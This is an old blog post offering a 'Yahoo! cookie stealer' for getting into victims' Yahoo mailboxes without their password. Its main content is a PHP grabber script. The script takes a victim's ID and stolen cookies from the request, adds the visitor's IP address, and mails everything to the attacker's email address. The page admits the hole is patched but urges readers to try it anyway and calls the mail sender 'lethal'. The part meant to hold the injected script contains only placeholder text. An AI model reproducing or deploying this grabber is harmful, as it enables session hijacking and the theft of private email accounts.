Thursday, December 13, 2007

Yahoo! cookie stealer

Yahoo! cookie stealer
Its patched but worth a try


This script can help anyone to acces victims inbox without knowing the password
Only works on IE 5x-6x and only with old Yahoo mailboxes (not with the Beta version)
===========================================================================
==============================
The Script:
==============================

Some text here

-

==============================
Php grabber (mail sender):
==============================

$to=" myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

?>

even if this is not gonna work... u can alwayz use this.. php mail sender.. which is lethal